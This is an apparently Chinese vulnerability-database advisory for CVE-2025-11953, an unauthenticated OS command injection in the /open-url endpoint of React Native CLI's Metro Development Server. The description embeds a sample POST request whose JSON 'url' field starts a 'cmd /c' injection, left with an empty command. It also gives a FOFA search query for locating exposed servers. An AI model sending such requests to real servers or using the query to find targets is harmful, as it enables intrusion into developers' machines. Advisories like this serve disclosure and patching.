返回列表

React Native CLI /open-url 命令执行漏洞（CVE-2025-11953）

CVE: CVE-2025-11953

CNVD: 暂无

CNNVD: 暂无

漏洞类型: 命令执行

漏洞等级: 高危

年份: 2026

POC_ID: 94504

漏洞描述

React Native CLI是一个流行的开源工具，用于开发React Native应用程序。Metro Development Server是其内置的开发服务器，它默认绑定到外部接口。该漏洞源于React Native CLI中内置的Metro Development Server默认绑定的外部接口对用户输入的不当处理，未经身份验证的攻击者可通过发送POST请求来注入操作系统命令，从而执行任意可执行文件。 POST /open-url HTTP/1.1 Host: Content-Type: application/json Content-Length: 349 User-Agent: curl/7.85.0 Connection: close {"url": "cmd /c "}

FOFA 语句

系统自动生成（不一定准确）：title="React Native CLI /open-url"

影响范围

React Native CLI

漏洞详情

POC: 已公开

漏洞 POC

登录后可查看漏洞 POC。请先登录或注册。

修复建议

暂无

参考来源

https://rss.biu.life/ti/React%20Native%20CLI%20/open-url%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2025-11953%EF%BC%89